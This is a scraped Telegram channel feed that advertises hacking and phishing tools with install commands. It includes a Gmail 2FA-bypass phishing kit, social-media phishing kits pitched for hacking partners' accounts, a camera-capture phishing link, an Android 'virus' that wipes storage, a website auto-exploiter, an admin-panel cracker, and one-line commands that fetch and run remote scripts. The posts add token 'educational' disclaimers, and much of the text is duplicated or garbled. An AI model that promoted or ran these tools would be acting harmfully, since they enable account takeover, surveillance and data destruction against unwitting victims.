This media is not supported in your browser
VIEW IN TELEGRAM
GMAIL PHISING WITH 2FA
DESCRIPTION :
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user. This repository aims at demonstrating how the attackers can bypass 2FA for gmail's authentication system. In this case, the two factors are password and a code sent to mobile user.
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ»
DESCRIPTION :
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user. This repository aims at demonstrating how the attackers can bypass 2FA for gmail's authentication system. In this case, the two factors are password and a code sent to mobile user.
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ»
π13π₯°2β€1
DEPENDENCIES-
Apache2
Python
Selenium
WHAT DOES THE REPOSITORY INCLUDE?
gmailPhising: contains the code of the gmail's authetication web.
logingmail.py: script for running the web browser "impersonating" the victim's login in the attacker's machine. This makes use of Selenium.
root.sh: this script running logingmail.py. Must be run as root for user www-data. This is configured in /etc/sudoers of the attacker's machine including the
following:
www-data ALL=(user) NOPASSWD: pathtoscript/root.sh
How to run ? .
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in gmail to fake gmail web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original gmail to log in with victim's credentials. This will cause gmail send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original gmail web, gaining the access to the victim account.
ENJOY βΊοΈ @TERMUXCOMMANDD
Apache2
Python
Selenium
WHAT DOES THE REPOSITORY INCLUDE?
gmailPhising: contains the code of the gmail's authetication web.
logingmail.py: script for running the web browser "impersonating" the victim's login in the attacker's machine. This makes use of Selenium.
root.sh: this script running logingmail.py. Must be run as root for user www-data. This is configured in /etc/sudoers of the attacker's machine including the
following:
www-data ALL=(user) NOPASSWD: pathtoscript/root.sh
How to run ? .
git clone https://github.com/afernandezb92/2FAGmailPhising.git
cd 2FAGmailPhising
pip install -r requirements.txt
chmod +x run.sh
chmod +x geckodriver
./run.sh
SCENERY:
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in gmail to fake gmail web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original gmail to log in with victim's credentials. This will cause gmail send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original gmail web, gaining the access to the victim account.
π8β€3
This RDP Only Created by @TERMUXCOMMANDD For Educational Purpose. If You Use It on Evil Purpose, Owner is Not Responsible For That.
[+] HOW TO USE:
[+] HOW TO USE:
1 : Fork This Repository. 2 : Create a Account On ngrok 3 : Copy Your Ngrok-Token 4 : Go To Your Forked Repository's "Setting" 5 : Click on The "Sicret" Option 6 : Add Your Sicret 7 : Go To Your Forked Repository's "Action" 8 : Select Your Workflow To "Cracker-RDP" 9 : Start Your Workflow
After Starting Workflow >-----------------------<
10: Go To Ngrok 11: Click On The Endpoint Option 11: And Click On The Status Option 12: Copy The URL without "tcp://" 13: The Copied Link Like: 8.tcp.ngrok.io:15003 14: Go To Your RDP Using Software 15: Then Put Your Url 16: Put The Username: runneradmin 17: Put The Password: P@ssw0rd! 18: And Connect it >---------------------< Your RDP is Ready >---------------------<π6
ABOUT TOOL :
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning π¦ This Virus Formates (Deletes) Full Internal Storage So think and Use.
AVAILABLE ON :
Termux
FEATURES :
[+] Dangerous virus tool !
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working virus tool for termux
INSTALLATION [Termux] :
ENJOY βΊοΈ @TERMUXCOMMANDD
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning π¦ This Virus Formates (Deletes) Full Internal Storage So think and Use.
AVAILABLE ON :
FEATURES :
[
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working virus tool for termux
INSTALLATION [Termux] :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/infect
cd $HOME
ls
cd infect
ls
bash infect.sh[+]-- Now you need internet connection to continue further process...
[+]-- You can select any option by clicking on your keyboard
[+]-- Note:- Don't delete any of the scripts included in lol directory (folder)π12π₯°3
THE CREDIT CARD FRAUDSTER
βONLY FOR EDUCATIONAL PURPOSES β
TIPS β - IF YOU DONT KNOW DONT TRY β. @TERMUXCOMMANDD
cardNumPre = "543210"
cardNumPost = "1234"
potentialSolutions = []
for i in range(0,1000000)
: cardNumMid = (str(i).zfill(6))
ccNum = cardNumPre + cardNumMid + cardNumPost
if int(ccNum) % 123457 == 0:
print(ccNum) potentialSolutions.append(ccNum)
for j in potentialSolutions:
print("CTFlearn{" + j + "}")Hints: 1/ Luhn_algorithm
2/ Flag format is CTFlearn{card_numberβONLY FOR EDUCATIONAL PURPOSES β
TIPS β - IF YOU DONT KNOW DONT TRY β. @TERMUXCOMMANDD
π7π4β€1π1
USAGE:
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing
3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here
ENJOY βΊοΈ @TERMUXCOMMANDD
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing
pip install -r requirements.txt in Command Prompt.3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here
β€6π3π1π1
CAMHACKER -
CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
+] INSTALLATION
For termux, use additional command -
Or Run Directly -
ENJOY βΊοΈ @TERMUXCOMMANDD
CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
+] INSTALLATION
git clone https://github.com/KasRoudra/CamHacker
cd CamHacker
termux-setup-storage , bash ch.shOr Run Directly -
wget https://raw.githubusercontent.com/KasRoudra/CamHacker/main/ch.sh && bash ch.shπ16
XAttacker V2.5 Tool
A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects itsβ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.
USAGE
Short Form
Long Form
Description
EXAMPLE
if you have list websites run tool with this command line
Installation Linux οΏΌ
DOWNLOAD TERMUX
Installation Windows οΏΌ :-
A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects itsβ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.
USAGE
Short Form
-lLong Form
--listDescription
WebSites List
EXAMPLE
if you have list websites run tool with this command line
perl XAttacker.pl -l list.txtInstallation Linux οΏΌ
git clone https://github.com/Moham3dRiahi/XAttacker.git cd XAttacker perl XAttacker.pl
DOWNLOAD TERMUX
git clone https://github.com/Moham3dRiahi/XAttacker.git cd XAttacker chmod +x termux-install.sh bash termux-install.shInstallation Windows οΏΌ :-
Download Perl Download XAttacker Extract XAttacker into Desktop Open CMD and type the following commands: cd Desktop/XAttacker-master/ perl XAttacker.plπ5β€2
DARKARMY
Hacking Tools Pack - A Penetration Testing Framework .
Installation Linux οΏΌ
This Tool Must Run As ROOT !!! β
That's it. You can execute tool by typing DARKARMY.
INSTALLATION TERMUX.
ENJOY βΊοΈ @TERMUXCOMMANDD
Hacking Tools Pack - A Penetration Testing Framework .
Installation Linux οΏΌ
This Tool Must Run As ROOT !!! β
git clone https://github.com/D4RK-4RMY/DARKARMY.git
cd DARKARMY
chmod +x install.sh
./install.shINSTALLATION TERMUX.
pkg install git
pkg install python
git clone https://github.com/D4RK-4RMY/DARKARMY.git
cd DARKARMY
chmod +x darkarmy.py
python2 darkarmy.py
π9β€1
WEBSCRAPE )
What is WebScrabe? Why WebScrabe? WebScrape is used to collect mail ID's and phone numbers from a websites.
TERMUX INSTALLATION GUIDE
You must have use https://....
INSTALLING AND REQUIREMENTS
Linux or Unix-based system
ENJOY βΊοΈ @TERMUXCOMMANDD
What is WebScrabe? Why WebScrabe? WebScrape is used to collect mail ID's and phone numbers from a websites.
TERMUX INSTALLATION GUIDE
pkg update -y
pkg upgrade -y
pkg install git
git clone https://github.com/3xploitGuy/webscrape.git
cd webscrape
webscrape
chmod +x webscrape.sh
webscrape
bash webscrape.sh
INSTALLING AND REQUIREMENTS
Linux or Unix-based system
~ β―β―β― git clone https://github.com/3xploitGuy/webscrape.git
~ β―β―β― cd webscrape
~/webscrape β―β―β― chmod +x webscrape.sh
~/webscrape β―β―β― ./webscrape.sh
π6β€3
SOCIOPHISH -
Best Tool for Phishing With 38+ templates , Now you can Hack your Girlfreind or Boyfreind Instagram or Facebook account by jus a single link ! HAVE FUN.
FEATURES
Latest Login pages.
Mask URL support
Best for Anyone
Docker support (checkout docker-legacy branch)
Multiple tunneling options
Localhost
Ngrok (With or without hotspot)
Cloudflared (Alternative of Ngrok)
Installation
Just, Clone this repository -
$
Change to cloned directory And run
$
$
On first launch, It'll install the dependencies and that's it.
Run on Docker
$
DEPENDENCIES
SocioPhisher requires following programs to run properly -
Supported Platform : Termux, Ubuntu/Debian/Kali/Parrot, Arch Linux/Manjaro, Fedora
ENJOY π«‘ @TERMUXCOMMANDD
Best Tool for Phishing With 38+ templates , Now you can Hack your Girlfreind or Boyfreind Instagram or Facebook account by jus a single link ! HAVE FUN.
FEATURES
Latest Login pages.
Mask URL support
Best for Anyone
Docker support (checkout docker-legacy branch)
Multiple tunneling options
Localhost
Ngrok (With or without hotspot)
Cloudflared (Alternative of Ngrok)
Installation
Just, Clone this repository -
$
git clone https://github.com/alexbieber/SocioPhish.gitChange to cloned directory And run
SocioPhish.sh $
cd SocioPhish$
bash sociophisher.shOn first launch, It'll install the dependencies and that's it.
SocioPhish is installedRun on Docker
$
docker pull alexbieber/SocioPhish
$ docker run --rm -it alexbieber/SocioPhish
DEPENDENCIES
SocioPhisher requires following programs to run properly -
phpwgetcurlgit
π21β€1
QRLJACKER - QRLJACKING EXPLOITATION FRAMEWORK
QRLJacker is a highly customizable exploitation framework to demonstrate "QRLJacking Attack Vector" to show how it is easy to hijack services that depend on QR Code as an authentication and login method, Mainly it aims to raise the security awareness regarding all the services using the QR Code as a main way to login users to different services!
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ». #WHATSAPPHACKING
QRLJacker is a highly customizable exploitation framework to demonstrate "QRLJacking Attack Vector" to show how it is easy to hijack services that depend on QR Code as an authentication and login method, Mainly it aims to raise the security awareness regarding all the services using the QR Code as a main way to login users to different services!
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ». #WHATSAPPHACKING
π6β€1
PREREQUISITES BEFORE INSTALLING:
1.Linux or MacOS. (Not working on windows)
2.Python 3.7+
Installing instructions:
βNote: Don't install QRLJacker and Firefox as root in a regular user's session because it's not supported by Firefox which would give error on running modules in framework.β
Important note: If you have multiple python version, use
1.Update Firefox browser to the latest version
2. Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :
3. Clone the repo with
then do
5. Now you can run the framework with
Ubuntu 18.04 Bionic Beaver
Kali Linux 2018.x and up
1.Linux or MacOS. (Not working on windows)
2.Python 3.7+
Installing instructions:
βNote: Don't install QRLJacker and Firefox as root in a regular user's session because it's not supported by Firefox which would give error on running modules in framework.β
Important note: If you have multiple python version, use
python3.7 command instead of python3 in the following steps and use python3.7 -m pip instead of pip, pip3 or even python3 -m pip because that's the reason of 95% of the issues opened here. I think people often skip the important parts π1.Update Firefox browser to the latest version
2. Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver3. Clone the repo with
git clone https://github.com/OWASP/QRLJackingthen do
cd QRLJacking/QRLJacker
4. Install all the requirements with pip install -r requirements.txt5. Now you can run the framework with
python3 QrlJacker.py --helpTESTED ON )Ubuntu 18.04 Bionic Beaver
Kali Linux 2018.x and up
β€5π2π1
This media is not supported in your browser
VIEW IN TELEGRAM
PYPHISHER
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.
[+] INSTALLATION
Install dependencies (git, python, php ssh)
For Debian (Ubuntu, Kali-Linux, Parrot)
ForTermux
Clone this repository
Enter the directory
Install all modules
Run the tool
Or, directly run
For Termux]
For Linux}.
Requirements
Python(3)
requests
bs4
PHP
SSH
200MB storage
If not found, php and python modoules will be installed on first run
ENJOY π«‘ @TERMUXCOMMANDD
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.
[+] INSTALLATION
Install dependencies (git, python, php ssh)
sudo apt install git python3 php openssh-client -y
For
pkg install git python3 php openssh -y
Clone this repository
Clone this repository
git clone https://github.com/KasRoudra/PyPhisher
Enter the directory
cd PyPhisher
pip3 install -r files/requirements.txtpython3 pyphisher.pyOr, directly run
wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
PIPpip3 install pyphisher [sudo pip3 install pyphisher [pyphisher
Python(3)
requests
bs4
PHP
SSH
200MB storage
If not found, php and python modoules will be installed on first run
π24β€3π1
Lazymux
Lazymux is a tool installer that is specially made for termux user which provides a lot of tool mainly used tools in termux and its easy to use, Lazymux install any of the given tools provided by it from itself with just one click, and its often get updated.
FEATURE
Tool Installation
Install Single Tool
Install Multi Tool
Install All Tool
lzmx > set_install @
Default Dir Install On
Example: lazymux.conf
Requirements
β’ Python 3.x
Installation and Using Lazymux
ENJOY π«‘ @TERMUXCOMMANDD
Lazymux is a tool installer that is specially made for termux user which provides a lot of tool mainly used tools in termux and its easy to use, Lazymux install any of the given tools provided by it from itself with just one click, and its often get updated.
Install Single Tool
lzmx > set_install 1Install Multi Tool
lzmx > set_install 1 2 3 4Install All Tool
lzmx > set_install @
Default Dir Install On
lazymux.conf replace symbol ~ with directory you wantExample: lazymux.conf
HOME = /sdcard
Requirements
β’ Python 3.x
Installation and Using Lazymux
apt install python git
git clone https://github.com/Gameye98/Lazymux
cd Lazymux
python lazymux.pyπ9β€2
H4X-Tools
Multiple useful tools in one program.
Setup
This tool is designed for Linux users, but it should work fine on Windows too.
Linux
1.Clone the repo
2.Run in terminal to install the tool.
If it doesnt work, install the dependencies manually and start the application in terminal using
To update the tool, run sh
Windows
1. Make sure you have python and git installed
2. Clone the repo
3. Run the setup.bat file.
To update the tool, run the program as usual (Inside the folder!!!) and then run the update
ENJOY π«‘ @TERMUXCOMMANDD
Multiple useful tools in one program.
Setup
This tool is designed for Linux users, but it should work fine on Windows too.
Linux
1.
git clone https://github.com/HerraVp/H4X-Tools.git2.
sh setup.sh If it doesnt work, install the dependencies manually and start the application in terminal using
python3 h4xtools.py.update.shWindows
1. Make sure you have python and git installed
2. Clone the repo
git clone https://github.com/HerraVp/H4X-Tools.git3. Run the setup.bat file.
To update the tool, run the program as usual (Inside the folder!!!) and then run the update
[11] option. π6β€3
ADMINHACK
will hack the admin panel of the site.
Installing for termux
Everything is ready! Now we are waiting for everything to download!
Installing for linux
Start Program
Enter a command to start AdminHack
ENJOY π«‘ @TERMUXCOMMANDD
will hack the admin panel of the site.
Installing for termux
pkg upgrade
pkg update
pkg install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.shEverything is ready! Now we are waiting for everything to download!
succes
Installing for linux
apt update
apt upgrade
apt install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.shStart Program
bash AdminHack.shπ9β€2
Do you want to rent a hacker for a day like darkweb ?
Final Results
84%
Yes please bring this service
16%
No I wonβt
π8β€2
USER FINDER
OSINT tool for finding profiles by username
How to Install
How to Start
ENJOY π«‘ @TERMUXCOMMANDD
OSINT tool for finding profiles by username
How to Install
apt update
apt upgrade
apt install git
git clone https://github.com/mishakorzik/UserFinder
How to Start
cd UserFinder
bash UserFinder.shπ4β€2
Termux_0.119.1_@TermuxCommandd.apk
107.2 MB
TERMUX LATEST VERSION
Note this it is not available on Play Store or App Store
Note this it is not available on Play Store or App Store
π15β€1